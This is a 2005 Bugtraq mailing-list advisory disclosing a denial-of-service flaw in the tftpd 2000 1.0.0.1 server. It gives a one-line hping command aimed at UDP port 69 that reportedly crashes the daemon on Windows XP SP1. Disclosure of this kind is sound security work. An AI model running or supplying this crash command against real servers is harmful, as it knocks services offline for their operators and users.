[39101] in bugtraq
tftp 2000 1.0.0.1
daemon@ATHENA.MIT.EDU (Josh Zlatin-Amishav)
Thu Jun 9 12:19:13 2005
Date: Thu, 9 Jun 2005 16:19:06 +0300 (IDT)
From: Josh Zlatin-Amishav <josh@tkos.co.il>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.61.0506091616400.17110@maoz.education.gov.il>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Another tftpd 2000 1.0.0.1 vulnerbility exists in that if you run
hping -2 xxx.xxx.xxx.xxx -p 69
The third packet crashes the tftp daemon on server xxx.xxx.xxx.xxx
This was tested on WinXP service pack 1
--
- Josh